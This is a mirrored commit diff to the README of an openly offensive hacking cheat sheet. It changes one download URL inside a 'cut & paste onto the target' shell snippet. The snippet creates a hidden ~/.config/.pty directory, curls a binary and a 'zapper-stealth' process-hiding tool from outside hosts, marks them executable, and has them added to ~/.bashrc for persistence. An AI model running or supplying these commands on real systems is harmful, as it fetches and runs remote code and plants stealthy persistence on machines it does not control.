mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-01-09 15:58:02 -05:00
Update README.md
This commit is contained in:
@@ -2289,7 +2289,7 @@ Deploy: Cut & paste the following onto the target and follow the instructions:
|
||||
```sh
|
||||
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
|
||||
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
|
||||
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.pkgforge.dev/$(uname -m)/Baseutils/util-linux/script" \
|
||||
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.pkgforge.dev/$(uname -m)/script" \
|
||||
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
|
||||
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
|
||||
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
|
||||
|
||||
Reference in New Issue
Block a user